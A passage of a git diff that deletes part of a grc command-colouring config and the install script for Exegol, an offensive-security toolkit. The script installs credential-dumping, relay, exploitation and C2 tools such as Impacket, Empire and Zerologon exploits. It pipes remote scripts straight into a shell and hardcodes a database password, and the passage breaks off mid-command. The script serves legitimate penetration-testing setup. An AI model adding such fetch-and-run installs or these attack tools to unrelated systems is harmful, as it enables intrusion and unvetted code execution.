?(-.)* ?l(ink)*\s? -conf.ipaddr - -# ip route -(^|[/\w\.]+/)ip r(oute)*\s? -conf.iproute - -# ip neighbor -(^|[/\w\.]+/)ip n(eighbor)*\s? -conf.ipneighbor - -# ip command - rest of commands -(^|[/\w\.]+/)ip?\s -conf.ip - -# env -(^|[/\w\.]+/)env\s? -conf.env - -# systemctl show -(^|[/\w\.]+/)systemctl show\s? -conf.env - -# iptables -(^|[/\w\.]+/)iptables\s? -conf.iptables - -# lspci -(^|[/\w\.]+/)lspci\s? -conf.lspci - -# lsblk -(^|[/\w\.]+/)lsblk\s? -conf.lsblk - -# lsof -(^|[/\w\.]+/)lsof\s? -conf.lsof - -# blkid -(^|[/\w\.]+/)blkid\s? -conf.blkid - -# id -(^|[/\w\.]+/)id\s? -conf.id - -# iostat / sar -(^|[/\w\.]+/)(iostat|sar)\s? -conf.iostat_sar - -# fdisk -(^|[/\w\.]+/)fdisk -l\s? -conf.fdisk - -# free -(^|[/\w\.]+/)free\s? -conf.free - -# findmnt -(^|[/\w\.]+/)findmnt\s? -conf.findmnt - ------------- -# docker - -# docker ps -(^|[/\w\.]+/)docker(-compose)? ps\s? -conf.dockerps - -(^|[/\w\.]+/)docker images\s? -conf.dockerimages - -(^|[/\w\.]+/)docker search\s? -conf.dockersearch - -#(^|[/\w\.]+/)docker pull\s? -#conf.dockerpull - -(^|[/\w\.]+/)docker-machine ls\s? -conf.docker-machinels - -(^|[/\w\.]+/)docker network ls\s? -conf.dockernetwork - -(^|[/\w\.]+/)docker info\s? -conf.dockerinfo - -(^|[/\w\.]+/)docker version\s? -conf.dockerversion ------------- - -# journalctl command -(^|[/\w\.]+/)journalctl?\s -conf.log - -# systemctl command -(^|[/\w\.]+/)systemctl?\s -conf.systemctl - -# sysctl command -(^|[/\w\.]+/)sysctl?\s -conf.sysctl - -# tcpdump command -(^|[/\w\.]+/)tcpdump\s? -conf.tcpdump - -# tune2fs command -(^|[/\w\.]+/)tune2fs\s? -conf.tune2fs - -# lsmod -(^|[/\w\.]+/)lsmod\s? -conf.lsmod - -# lsattr -(^|[/\w\.]+/)lsattr\s? -conf.lsattr - -# semanage --------------------------------- -(^|[/\w\.]+/)semanage boolean\s? -conf.semanageboolean -(^|[/\w\.]+/)semanage fcontext\s? -conf.semanagefcontext -(^|[/\w\.]+/)semanage (user|login|port)\s? -conf.semanageuser - -# getsebool -(^|[/\w\.]+/)getsebool\s? -conf.getsebool - -# ulimit -(^|[/\w\.]+/)ulimit\s? -conf.ulimit - -# vmstat -(^|[/\w\.]+/)vmstat\s? -conf.vmstat - -# dnf -(^|[/\w\.]+/)dnf\s? -conf.dnf - -# nmap -(^|[/\w\.]+/)nmap\s? -conf.nmap - -# uptime | w -(^|[/\w\.]+/)(uptime|w)\b -conf.uptime - -# getfacl -(^|[/\w\.]+/)getfacl\s? -conf.getfacl - -# ntpdate -(^|[/\w\.]+/)ntpdate\s? -conf.ntpdate - -# showmount -(^|[/\w\.]+/)showmount\s? -conf.showmount - -# apache ant command -(^|[/\w\.]+/)ant\s? -conf.ant - -# # apache maven command -(^|[/\w\.]+/)mvn\s? -conf.mvn - -# iwconfig command -(^|[/\w\.]+/)iwconfig\s? -conf.iwconfig - - -# lolcat command -(^|[/\w\.]+/)lolcat\s? -conf.lolcat - -# whois -(^|[/\w\.]+/)whois\s? -conf.whois \ No newline at end of file diff --git a/sources/install.sh b/sources/install.sh deleted file mode 100644 index 84c148cc..00000000 --- a/sources/install.sh +++ /dev/null @@ -1,2539 +0,0 @@ -#!/bin/bash -# Author: Charlie BROMBERG (Shutdown - @_nwodtuhs) - -VERSION="3.1.12.dev" - -RED='\033[1;31m' -BLUE='\033[1;34m' -GREEN='\033[1;32m' -NOCOLOR='\033[0m' - -function colorecho () { - echo -e "${BLUE}[EXEGOL] $@${NOCOLOR}" -} - -function update() { - colorecho "Updating, upgrading, cleaning" - apt-get -y update && apt-get -y install apt-utils && apt-get -y upgrade && apt-get -y autoremove && apt-get clean -} - -function fapt() { - colorecho "Installing apt-get package: $@" - apt-get install -y --no-install-recommends "$@" || exit -} - -function python-pip() { - colorecho "Installing python-pip (for Python2.7)" - curl --insecure https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py - python get-pip.py - rm get-pip.py -} - -function filesystem() { - colorecho "Preparing filesystem" - mkdir -p /opt/tools/ - mkdir -p /opt/tools/bin/ - mkdir -p /data/ - mkdir -p /opt/resources/ - mkdir -p /opt/resources/windows/ - mkdir -p /opt/resources/linux/ - mkdir -p /opt/resources/mac/ - mkdir -p /opt/resources/cracking/ - mkdir -p /opt/resources/webshells/ - mkdir -p /opt/resources/webshells/PHP/ - mkdir -p /opt/resources/webshells/ASPX/ - mkdir -p /opt/resources/webshells/JSP/ - mkdir -p "/opt/resources/encrypted disks/" -} - -function install_ohmyzsh() { - colorecho "Installing oh-my-zsh, config, history, aliases" - sh -c "$(curl -fsSL https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)" - cp -v /root/sources/zsh/history ~/.zsh_history - cp -v /root/sources/zsh/aliases /opt/.zsh_aliases - cp -v /root/sources/zsh/zshrc ~/.zshrc - git -C ~/.oh-my-zsh/custom/plugins/ clone https://github.com/zsh-users/zsh-autosuggestions - git -C ~/.oh-my-zsh/custom/plugins/ clone https://github.com/zsh-users/zsh-syntax-highlighting - git -C ~/.oh-my-zsh/custom/plugins/ clone https://github.com/zsh-users/zsh-completions - git -C ~/.oh-my-zsh/custom/plugins/ clone https://github.com/agkozak/zsh-z - git -C ~/.oh-my-zsh/custom/plugins/ clone https://github.com/lukechilds/zsh-nvm - zsh -c "source ~/.oh-my-zsh/custom/plugins/zsh-nvm/zsh-nvm.plugin.zsh" # this is needed to start an instance of zsh to have the plugin set up -} - -function locales() { - colorecho "Configuring locales" - apt-get -y install locales - sed -i -e 's/# en_US.UTF-8 UTF-8/en_US.UTF-8 UTF-8/' /etc/locale.gen && locale-gen -} - -function tmux() { - colorecho "Installing tmux" - apt-get -y install tmux - cp -v /root/sources/tmux/tmux.conf ~/.tmux.conf - touch ~/.hushlogin -} - -function install_responder() { - colorecho "Installing Responder" - git -C /opt/tools/ clone https://github.com/lgandx/Responder - sed -i 's/ Random/ 1122334455667788/g' /opt/tools/Responder/Responder.conf - sed -i 's/files\/AccessDenied.html/\/opt\/tools\/Responder\/files\/AccessDenied.html/g' /opt/tools/Responder/Responder.conf - sed -i 's/files\/BindShell.exe/\/opt\/tools\/Responder\/files\/BindShell.exe/g' /opt/tools/Responder/Responder.conf - sed -i 's/certs\/responder.crt/\/opt\/tools\/Responder\/certs\/responder.crt/g' /opt/tools/Responder/Responder.conf - sed -i 's/certs\/responder.key/\/opt\/tools\/Responder\/certs\/responder.key/g' /opt/tools/Responder/Responder.conf - fapt gcc-mingw-w64-x86-64 - x86_64-w64-mingw32-gcc /opt/tools/Responder/tools/MultiRelay/bin/Runas.c -o /opt/tools/Responder/tools/MultiRelay/bin/Runas.exe -municode -lwtsapi32 -luserenv - x86_64-w64-mingw32-gcc /opt/tools/Responder/tools/MultiRelay/bin/Syssvc.c -o /opt/tools/Responder/tools/MultiRelay/bin/Syssvc.exe -municode - cd /opt/tools/Responder - /opt/tools/Responder/certs/gen-self-signed-cert.sh -} - -function Sublist3r() { - colorecho "Installing Sublist3r" - git -C /opt/tools/ clone https://github.com/aboul3la/Sublist3r.git - python3 -m pip install -r /opt/tools/Sublist3r/requirements.txt -} - -function ReconDog() { - colorecho "Installing ReconDog" - git -C /opt/tools/ clone https://github.com/s0md3v/ReconDog - python3 -m pip install -r /opt/tools/ReconDog/requirements.txt -} - -function githubemail() { - colorecho "Installing github-email" - npm install --global github-email -} - -function onionsearch() { - colorecho "Installing onionsearch" - git -C /opt/tools/ clone https://github.com/megadose/onionsearch - cd /opt/tools/onionsearch - python3 setup.py install - rm -rf /opt/tools/onionsearch -} - -function photon() { - colorecho "Installing photon" - git -C /opt/tools/ clone https://github.com/s0md3v/photon - python3 -m pip install -r /opt/tools/photon/requirements.txt -} - - -function WikiLeaker() { - colorecho "Installing WikiLeaker" - git -C /opt/tools/ clone https://github.com/jocephus/WikiLeaker.git - python3 -m pip install -r /opt/tools/WikiLeaker/requirements.txt -} - - -function OSRFramework() { - colorecho "Installing OSRFramework" - python3 -m pip install osrframework -} - -function sn0int() { - colorecho "Installing sn0int" - apt-get install debian- -y - gpg -a --export --keyring /usr/share/keyrings/debian-maintainers.gpg git@rxv.cc | apt-key add - - apt-key adv --keyserver keyserver.ubuntu.com --refresh-keys git@rxv.cc - echo deb http://apt.vulns.sexy stable main > /etc/apt/sources.list.d/apt-vulns-sexy.list - apt-get update -y - apt-get install sn0int -y - apt-get install --fix-broken -y -} - -function install_CloudFail() { - colorecho "Installing CloudFail" - git -C /opt/tools/ clone https://github.com/m0rtem/CloudFail - python3 -m pip install -r /opt/tools/CloudFail/requirements.txt -} - -function OneForAll() { - colorecho "Installing OneForAll" - git -C /opt/tools/ clone https://github.com/shmilylty/OneForAll.git - python3 -m pip install -r /opt/tools/OneForAll/requirements.txt -} - -function install_EyeWitness() { - colorecho "Installing EyeWitness" - git -C /opt/tools/ clone https://github.com/FortyNorthSecurity/EyeWitness - cd /opt/tools/EyeWitness/Python/setup - ./setup.sh -} - -function install_wafw00f() { - colorecho "Installing wafw00f" - git -C /opt/tools/ clone https://github.com/EnableSecurity/wafw00f - cd /opt/tools/wafw00f - python setup.py install -} - -function JSParser() { - colorecho "Installing JSParser" - git -C /opt/tools/ clone https://github.com/nahamsec/JSParser - cd /opt/tools/JSParser - python setup.py install -} - -function LinkFinder() { - colorecho "Installing LinkFinder" - git -C /opt/tools/ clone https://github.com/GerbenJavado/LinkFinder.git - cd /opt/tools/LinkFinder - python3 -m pip install -r requirements.txt - python3 setup.py install -} - -function SSRFmap() { - colorecho "Installing SSRFmap" - git -C /opt/tools/ clone https://github.com/swisskyrepo/SSRFmap - cd /opt/tools/SSRFmap - python3 -m pip install -r requirements.txt -} - -function NoSQLMap() { - colorecho "Installing NoSQLMap" - git -C /opt/tools clone https://github.com/codingo/NoSQLMap.git - cd /opt/tools/NoSQLMap - python setup.py install -} - -function install_odat() { - odat_latest=$(curl -L -s https://github.com/quentinhardy/odat/releases/latest | grep tar.gz | cut -d '"' -f 2 | head -1) - wget "https://github.com/$odat_latest" -O /tmp/odat_latest.tar.gz - mkdir -p /opt/tools/odat - tar xvf /tmp/odat_latest.tar.gz -C /opt/tools/odat --strip=2 - mv /opt/tools/odat/odat* /opt/tools/odat/odat - echo -e '#!/bin/sh\n(cd /opt/tools/odat/ && ./odat $@)' > /usr/local/bin/odat - chmod +x /usr/local/bin/odat -} - -function fuxploider() { - colorecho "Installing fuxploider" - git -C /opt/tools/ clone https://github.com/almandin/fuxploider.git - cd /opt/tools/fuxploider - python3 -m pip install -r requirements.txt -} - -function CORScanner() { - colorecho "Installing CORScanner" - git -C /opt/tools/ clone https://github.com/chenjj/CORScanner.git - cd /opt/tools/CORScanner - python -m pip install -r requirements.txt -} - -function Blazy() { - colorecho "Installing Blazy" - git -C /opt/tools/ clone https://github.com/UltimateHackers/Blazy - cd /opt/tools/Blazy - python -m pip install -r requirements.txt -} - -function XSStrike() { - colorecho "Installing XSStrike" - git -C /opt/tools/ clone https://github.com/s0md3v/XSStrike.git - python3 -m pip install fuzzywuzzy -} - -function install_XSpear() { - colorecho "Installing XSpear" - gem install XSpear -} - -function install_pass_station() { - colorecho "Installing Pass Station" - gem install pass-station -} - -function evilwinrm() { - colorecho "Installing evil-winrm" - gem install evil-winrm -} - -function Bolt() { - colorecho "Installing Bolt" - git -C /opt/tools/ clone https://github.com/s0md3v/Bolt.git -} - -function install_crackmapexec() { - colorecho "Installing CrackMapExec" - apt-get -y install libssl-dev libffi-dev python2-dev build-essential python3-winrm python3-venv - git -C /opt/tools/ clone --recursive https://github.com/byt3bl33d3r/CrackMapExec - cd /opt/tools/CrackMapExec - # Redefining baseDN from domain name instead of KDC - curl --location https://github.com/byt3bl33d3r/CrackMapExec/pull/535.patch | git apply --verbose - python3 -m pipx install . - mkdir -p ~/.cme - cp -v /root/sources/crackmapexec/cme.conf ~/.cme/cme.conf - # this is for having the ability to check the source code when working with modules and so on - #git -C /opt/tools/ clone https://github.com/byt3bl33d3r/CrackMapExec -# apt-get -y install crackmapexec - cp -v /root/sources/grc/conf.cme /usr/share/grc/conf.cme -} - -function install_lsassy() { - colorecho "Installing lsassy" - git -C /opt/tools/ clone https://github.com/Hackndo/lsassy/ - cd /opt/tools/lsassy - git checkout 3.0.0 - git pull origin 3.0.0 - python3 setup.py install - # python3 -m pip install 'asn1crypto>=1.3.0' -} - -function sprayhound() { - colorecho "Installing sprayhound" - git -C /opt/tools/ clone https://github.com/Hackndo/sprayhound - cd /opt/tools/sprayhound - apt-get -y install libsasl2-dev libldap2-dev - python3 -m pip install "pyasn1<0.5.0,>=0.4.6" - python3 setup.py install -} - -function install_impacket() { - colorecho "Installing Impacket scripts" - git -C /opt/tools/ clone https://github.com/SecureAuthCorp/impacket - cd /opt/tools/impacket/ - # 1063: User-defined password for LDAP attack addComputer - # 1249: Shadow Credentials in ntlmrelayx.py - # 1135: Improved searchFilter for GetUserSPNs - # 1184: Added user filter on findDelegation - # 1201: Added describeTicket - # 1202: Added self for getST - # 1224: Added renameMachine.py - # 1253: Added LSA dump on top of SAM dump for ntlmrelayx - # 1256: Added tgssub script for service substitution - # 1265: Fixes Ccache to Kirbi conversion issues - # 1267: Better handling of various XML files in Group Policy Preferences - # 1270: Fix ticketer duration to support default 10 hours tickets - git config --global user.email "exegol@install.er" - git config --global user.name "Exegol installer" - prs="1063 1249 1135 1184 1201 1202 1224 1253 1256 1265 1267 1270" - for pr in $prs; do git fetch origin pull/$pr/head:pull/$pr && git merge --no-edit pull/$pr; done - python3 -m pip install . - cp -v /root/sources/grc/conf.ntlmrelayx /usr/share/grc/conf.ntlmrelayx - cp -v /root/sources/grc/conf.secretsdump /usr/share/grc/conf.secretsdump - cp -v /root/sources/grc/conf.getgpppassword /usr/share/grc/conf.getgpppassword - cp -v /root/sources/grc/conf.rbcd /usr/share/grc/conf.rbcd - cp -v /root/sources/grc/conf.describeTicket /usr/share/grc/conf.describeTicket -} - -function install_bloodhound.py() { - colorecho "Installing and Python ingestor for BloodHound" - git -C /opt/tools/ clone https://github.com/fox-it/BloodHound.py -} - -function neo4j_install() { - colorecho "Installing neo4j" - wget -O - https://debian.neo4j.com/neotechnology.gpg.key | apt-key add - - echo 'deb https://debian.neo4j.com stable latest' | tee /etc/apt/sources.list.d/neo4j.list - apt-get update - apt-get -y install --no-install-recommends gnupg libgtk2.0-bin libcanberra-gtk-module libx11-xcb1 libva-glx2 libgl1-mesa-glx libgl1-mesa-dri libgconf-2-4 libasound2 libxss1 - apt-get -y install neo4j - #mkdir /usr/share/neo4j/conf - neo4j-admin set-initial-password exegol4thewin - mkdir -p /usr/share/neo4j/logs/ - touch /usr/share/neo4j/logs/neo4j.log -} - -function cypheroth() { - colorecho "Installing cypheroth" - git -C /opt/tools/ clone https://github.com/seajaysec/cypheroth/ -} - -function mitm6_sources() { - colorecho "Installing mitm6 from sources" - git -C /opt/tools/ clone https://github.com/fox-it/mitm6 - cd /opt/tools/mitm6/ - python3 -m pip install -r requirements.txt - python3 setup.py install -} - -function mitm6_pip() { - colorecho "Installing mitm6 with pip" - python3 -m pip install service_identity - python3 -m pip install mitm6 - cd /usr/lib/x86_64-linux-gnu/ - ln -s -f libc.a liblibc.a -} - -function aclpwn() { - colorecho "Installing aclpwn with pip" - python3 -m pip install aclpwn - sed -i 's/neo4j.v1/neo4j/g' /usr/local/lib/python3.8/dist-packages/aclpwn/database.py -} - -function IceBreaker() { - colorecho "Installing IceBreaker" - apt-get -y install lsb-release python3-libtmux python3-libnmap python3-ipython - python -m pip install pipenva - git -C /opt/tools/ clone https://github.com/DanMcInerney/icebreaker - cd /opt/tools/icebreaker/ - ./setup.sh - pipenv --three install -} - -function install_routersploit() { - colorecho "Installing RouterSploit" - git -C /opt/tools/ clone https://www.github.com/threat9/routersploit - cd /opt/tools/routersploit - python3 -m pip install -r requirements.txt -} - -function Empire() { - colorecho "Installing Empire" - export STAGING_KEY=$(echo exegol4thewin | md5sum | cut -d ' ' -f1) - python -m pip install pefile - git -C /opt/tools/ clone https://github.com/BC-SECURITY/Empire - cd /opt/tools/Empire/setup - ./install.sh -} - -function Sn1per() { - colorecho "Installing Sn1per" - git -C /opt/tools/ clone https://github.com/1N3/Sn1per - sed -i 's/read answer/echo no answer to give/' /opt/tools/Sn1per/install.sh - sed -i 's/cp/cp -v/g' /opt/tools/Sn1per/install.sh - sed -i 's/mkdir/mkdir -v/g' /opt/tools/Sn1per/install.sh - sed -i 's/rm/rm -v/g' /opt/tools/Sn1per/install.sh - sed -i 's/mv/mv -v/g' /opt/tools/Sn1per/install.sh - sed -i 's/wget/wget -v/g' /opt/tools/Sn1per/install.sh - sed -i 's/2> \/dev\/null//g' /opt/tools/Sn1per/install.sh - cd /opt/tools/Sn1per/ - bash install.sh -} - -function dementor() { - colorecho "Installing dementor" - mkdir /opt/tools/dementor - python -m pip install pycryptodomex - wget -O /opt/tools/dementor/dementor.py https://gist.githubusercontent.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc/raw/7c7f09ea46eff4ede636f69c00c6dfef0541cd14/dementor.py -} - -function assetfinder() { - colorecho "Installing assetfinder" - go install -v github.com/tomnomnom/assetfinder@latest -} - -function install_subfinder() { - colorecho "Installing subfinder" - go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest -} - -function install_gobuster() { - colorecho "Installing gobuster" - go install github.com/OJ/gobuster/v3@latest -} - -function install_kiterunner() { - colorecho "Installing kiterunner (kr)" - git -C /opt/tools/ clone https://github.com/assetnote/kiterunner.git - cd /opt/tools/kiterunner - wget https://wordlists-cdn.assetnote.io/data/kiterunner/routes-large.kite.tar.gz - wget https://wordlists-cdn.assetnote.io/data/kiterunner/routes-small.kite.tar.gz - make build - ln -s $(pwd)/dist/kr /opt/tools/bin/kr -} - -function install_dirsearch() { - colorecho "Installing dirsearch" - git -C /opt/tools/ clone https://github.com/maurosoria/dirsearch - cd /opt/tools/dirsearch/ - python3 -m pip install . -} - -function install_cmsmap() { - colorecho "Installing CMSmap" - git -C /opt/tools/ clone https://github.com/Dionach/CMSmap.git - cd /opt/tools/CMSmap/ - python3 -m pip install . - cmsmap -U PC -} - -function install_tomcatwardeployer() { - colorecho "Installing tomcatWarDeployer" - git -C /opt/tools/ clone https://github.com/mgeeky/tomcatWarDeployer.git - cd /opt/tools/tomcatWarDeployer/ - python -m pip install -r requirements.txt -} - -function install_clusterd() { - colorecho "Installing clusterd" - git -C /opt/tools/ clone https://github.com/hatRiot/clusterd.git - cd /opt/tools/clusterd/ - python -m pip install -r requirements.txt - echo -e '#!/bin/sh\n(cd /opt/tools/clusterd/ && python clusterd.py $@)' > /usr/local/bin/clusterd - chmod +x /usr/local/bin/clusterd -} - -function install_moodlescan() { - colorecho "Installing moodlescan" - git -C /opt/tools/ clone https://github.com/inc0d3/moodlescan.git - cd /opt/tools/moodlescan/ - python3 -m pip install -r requirements.txt - /opt/tools/moodlescan/moodlescan.py -a -} - -function install_arjun() { - colorecho "Installing arjun" - python3 -m pip install arjun -} - -function amass() { - colorecho "Installing amass" - go install -v github.com/OWASP/Amass/v3/...@latest -} - -function install_ffuf() { - colorecho "Installing ffuf" - go install -v github.com/ffuf/ffuf@latest -} - -function install_waybackurls() { - colorecho "Installing waybackurls" - go install -v github.com/tomnomnom/waybackurls@latest -} - -function install_gitrob(){ - colorecho "Installing gitrob" - go install -v github.com/michenriksen/gitrob@latest -} - -function gron() { - colorecho "Installing gron" - go install -v github.com/tomnomnom/gron@latest -} - -function timing_attack() { - colorecho "Installing timing_attack" - gem install timing_attack -} - -function updog() { - colorecho "Installing updog" - python3 -m pip install updog -} - -function findomain() { - colorecho "Installing findomain" - wget -O /opt/tools/bin/findomain https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-linux - chmod +x /opt/tools/bin/findomain -} - -function install_proxychains() { - colorecho "Installing proxychains" - git -C /opt/tools/ clone https://github.com/rofl0r/proxychains-ng - cd /opt/tools/proxychains-ng/ - ./configure --prefix=/usr --sysconfdir=/etc - make - make install - make install-config - cp -v /root/sources/proxychains/proxychains.conf /etc/proxychains.conf -} - -function install_grc() { - colorecho "Installing and configuring grc" - apt-get -y install grc - cp -v /root/sources/grc/grc.conf /etc/grc.conf -} - -function install_nvm() { - colorecho "Installing nvm (in zsh context)" - zsh -c "source ~/.zshrc && nvm install node" -} - -function pykek() { - colorecho "Installing Python Kernel Exploit Kit (pykek) for MS14-068" - git -C /opt/tools/ clone https://github.com/preempt/pykek -} - -function install_autorecon() { - colorecho "Installing autorecon" - apt-get -y install wkhtmltopdf oscanner tnscmd10g - git -C /opt/tools/ clone https://github.com/Tib3rius/AutoRecon - cd /opt/tools/AutoRecon/ - python3 -m pip install -r requirements.txt - chmod +x /opt/tools/AutoRecon/autorecon.py -} - -function install_simplyemail() { - colorecho "Installing SimplyEmail" - git -C /opt/tools/ clone https://github.com/SimplySecurity/SimplyEmail.git - cd /opt/tools/SimplyEmail/ - sudo bash setup/setup.sh -} - -function privexchange() { - colorecho "Installing privexchange" - git -C /opt/tools/ clone https://github.com/dirkjanm/PrivExchange -} - -function LNKUp() { - colorecho "Installing LNKUp" - git -C /opt/tools/ clone https://github.com/Plazmaz/LNKUp - cd /opt/tools/LNKUp - python -m pip install -r requirements.txt -} - -function pwntools() { - colorecho "Installing pwntools" - python -m pip install pwntools - python3 -m pip install pwntools -} - -function install_angr() { - colorecho "Installing angr" - python -m pip install angr - python3 -m pip install angr -} - -function pwndbg() { - colorecho "Installing pwndbg" - apt-get -y install python3.8 python3.8-dev - git -C /opt/tools/ clone https://github.com/pwndbg/pwndbg - cd /opt/tools/pwndbg - ./setup.sh - echo 'set disassembly-flavor intel' >> ~/.gdbinit -} - -function darkarmour() { - colorecho "Installing darkarmour" - git -C /opt/tools/ clone https://github.com/bats3c/darkarmour - cd /opt/tools/darkarmour - apt-get -y install mingw-w64-tools mingw-w64-common g++-mingw-w64 gcc-mingw-w64 upx-ucl osslsigncode -} - -function powershell() { - colorecho "Installing powershell" - apt-get -y install powershell - mv /opt/microsoft /opt/tools/microsoft - rm /usr/bin/pwsh - ln -s /opt/tools/microsoft/powershell/7/pwsh /usr/bin/pwsh -} - -function install_fzf() { - colorecho "Installing fzf" - git -C /opt/tools/ clone --depth 1 https://github.com/junegunn/fzf.git - cd /opt/tools/fzf - ./install --all -} - -function install_shellerator() { - colorecho "Installing shellerator" - git -C /opt/tools/ clone https://github.com/ShutdownRepo/shellerator - cd /opt/tools/shellerator - python3 -m pipx install . -} - -function install_uberfile() { - colorecho "Installing uberfile" - git -C /opt/tools/ clone https://github.com/ShutdownRepo/uberfile - cd /opt/tools/uberfile/ - python3 -m pipx install . -} - -function kadimus() { - colorecho "Installing kadimus" - apt-get -y install libcurl4-openssl-dev libpcre3-dev libssh-dev - git -C /opt/tools/ clone https://github.com/P0cL4bs/Kadimus - cd /opt/tools/Kadimus - make -} - -function install_testssl() { - colorecho "Installing testssl" - apt-get -y install bsdmainutils - git -C /opt/tools/ clone --depth 1 https://github.com/drwetter/testssl.sh.git -} - -function install_bat() { - colorecho "Installing bat" - version=$(curl -s https://api.github.com/repos/sharkdp/bat/releases/latest | grep "tag_name" | cut -d 'v' -f2 | cut -d '"' -f1) - wget https://github.com/sharkdp/bat/releases/download/v$version/bat_$version\_amd64.deb - fapt -f ./bat_$version\_amd64.deb - rm bat_$version\_amd64.deb -} - -function install_mdcat() { - colorecho "Installing mdcat" - version=$(curl -s https://api.github.com/repos/lunaryorn/mdcat/releases/latest | grep "tag_name" | cut -d '"' -f4) - wget https://github.com/lunaryorn/mdcat/releases/download/$version/$version-x86_64-unknown-linux-musl.tar.gz - tar xvfz $version-x86_64-unknown-linux-musl.tar.gz - mv $version-x86_64-unknown-linux-musl/mdcat /opt/tools/bin - rm -r $version-x86_64-unknown-linux-musl.tar.gz $version-x86_64-unknown-linux-musl - chown root:root /opt/tools/bin/mdcat -} - -function xsrfprobe() { - colorecho "Installing XSRFProbe" - git -C /opt/tools/ clone https://github.com/0xInfection/XSRFProbe - cd /opt/tools/XSRFProbe - python3 setup.py install -} - -function krbrelayx() { - colorecho "Installing krbrelayx" - python -m pip install dnstool==1.15.0 - git -C /opt/tools/ clone https://github.com/dirkjanm/krbrelayx - cd /opt/tools/krbrelayx/ - cp -v /root/sources/grc/conf.krbrelayx /usr/share/grc/conf.krbrelayx -} - -function hakrawler() { - colorecho "Installing hakrawler" - go install -v github.com/hakluke/hakrawler@latest -} - -function install_jwt_tool() { - colorecho "Installing JWT tool" - git -C /opt/tools/ clone https://github.com/ticarpi/jwt_tool - python3 -m pip install pycryptodomex -} - -function jwt_cracker() { - colorecho "Installing JWT cracker" - apt-get -y install npm - npm install --global jwt-cracker -} - -function wuzz() { - colorecho "Installing wuzz" - go install -v github.com/asciimoo/wuzz@latest -} - -function gf_install() { - colorecho "Installing gf" - mkdir ~/.gf - go install -v github.com/tomnomnom/gf@latest - echo 'source $GOPATH/src/github.com/tomnomnom/gf/gf-completion.zsh' | tee -a ~/.zshrc - cp -rv ~/go/src/github.com/tomnomnom/gf/examples/* ~/.gf - # TODO: fix this when building : cp: cannot stat '/root/go/src/github.com/tomnomnom/gf/examples/*': No such file or directory - gf -save redirect -HanrE 'url=|rt=|cgi-bin/redirect.cgi|continue=|dest=|destination=|go=|out=|redir=|redirect_uri=|redirect_url=|return=|return_path=|returnTo=|rurl=|target=|view=|from_url=|load_url=|file_url=|page_url=|file_name=|page=|folder=|folder_url=|login_url=|img_url=|return_url=|return_to=|next=|redirect=|redirect_to=|logout=|checkout=|checkout_url=|goto=|next_page=|file=|load_file=' -} - -function rockyou() { - colorecho "Decompressing rockyou.txt" - gunzip -d /usr/share/wordlists/rockyou.txt.gz -} - -function rbcd-attack() { - colorecho "Installing rbcd-attack" - git -C /opt/tools/ clone https://github.com/tothi/rbcd-attack -} - -function rbcd-permissions() { - colorecho "Installing rbcd_permissions (alternative to rbcd-attack)" - git -C /opt/tools/ clone https://github.com/NinjaStyle82/rbcd_permissions -} - -function pypykatz() { - colorecho "Installing pypykatz" - python3 -m pip install pypykatz -} - -function enyx() { - colorecho "Installing enyx" - git -C /opt/tools/ clone https://github.com/trickster0/Enyx -} - -function enum4linux-ng() { - colorecho "Installing enum4linux-ng" - git -C /opt/tools/ clone https://github.com/cddmp/enum4linux-ng -} - -function install_git-dumper() { - colorecho "Installing git-dumper" - git -C /opt/tools/ clone https://github.com/arthaud/git-dumper - cd /opt/tools/git-dumper - python3 -m pip install -r requirements.txt -} - -function install_gittools() { - colorecho "Installing GitTools" - git -C /opt/tools/ clone https://github.com/internetwache/GitTools.git -} - -function gopherus() { - colorecho "Installing gopherus" - git -C /opt/tools/ clone https://github.com/tarunkant/Gopherus - cd /opt/tools/Gopherus - ./install.sh -} - -function install_ysoserial() { - colorecho "Installing ysoserial" - mkdir /opt/tools/ysoserial/ - wget -O /opt/tools/ysoserial/ysoserial.jar "https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar" -} - -function ysoserial_net() { - colorecho "Downloading ysoserial" - url=$(curl -s https://github.com/pwntester/ysoserial.net/releases/latest | grep -o '"[^"]*"' | tr -d '"' | sed 's/tag/download/') - tag=${url##*/} - prefix=${tag:1} - wget -O /tmp/ysoserial_net.zip "$url/ysoserial-$prefix.zip" - unzip -d /opt/resources/windows/ /tmp/ysoserial_net.zip - mv /opt/resources/windows/Release/ /opt/resources/windows/ysoserial.net - rm /tmp/ysoserial_net.zip -} - -function phpggc(){ - colorecho "Installing phpggc" - git -C /opt/tools clone https://github.com/ambionics/phpggc.git -} - -function symfony_exploits(){ - colorecho "Installing symfony-exploits" - git -C /opt/tools clone https://github.com/ambionics/symfony-exploits -} - -function install_john() { - colorecho "Installing john the ripper" - fapt qtbase5-dev - git -C /opt/tools/ clone https://github.com/openwall/john - cd /opt/tools/john/src && ./configure && make -} - -function install_nth() { - colorecho "Installing Name-That-Hash" - python3 -m pip install name-that-hash -} - -function memcached-cli() { - colorecho "Installing memcached-cli" - npm install -g memcached-cli -} - -function zerologon() { - colorecho "Pulling CVE-2020-1472 exploit and scan scripts" - git -C /opt/tools/ clone https://github.com/SecuraBV/CVE-2020-1472 - mv /opt/tools/CVE-2020-1472 /opt/tools/zerologon-scan - git -C /opt/tools/ clone https://github.com/dirkjanm/CVE-2020-1472 - mv /opt/tools/CVE-2020-1472 /opt/tools/zerologon-exploit -} - -function install_proxmark3() { - colorecho "Installing proxmark3 client" - colorecho "Compiling proxmark client for generic usage with PLATFORM=PM3OTHER (read https://github.com/RfidResearchGroup/proxmark3/blob/master/doc/md/Use_of_Proxmark/4_Advanced-compilation-parameters.md#platform)" - colorecho "It can be compiled again for RDV4.0 with 'make clean && make all && make install' from /opt/tools/proxmak3/" - apt-get -y install --no-install-recommends git ca-certificates build-essential pkg-config libreadline-dev gcc-arm-none-eabi libnewlib-dev qtbase5-dev libbz2-dev libbluetooth-dev - git -C /opt/tools/ clone https://github.com/RfidResearchGroup/proxmark3.git - cd /opt/tools/proxmark3 - make clean - make all PLATFORM=PM3OTHER - make install PLATFORM=PM3OTHER -} - -function checksec_py() { - colorecho "Installing checksec.py" - python3 -m pip install checksec.py -} - -function sysinternals() { - colorecho "Downloading SysinternalsSuite" - wget -O /opt/resources/windows/sysinternals.zip "https://download.sysinternals.com/files/SysinternalsSuite.zip" - unzip -d 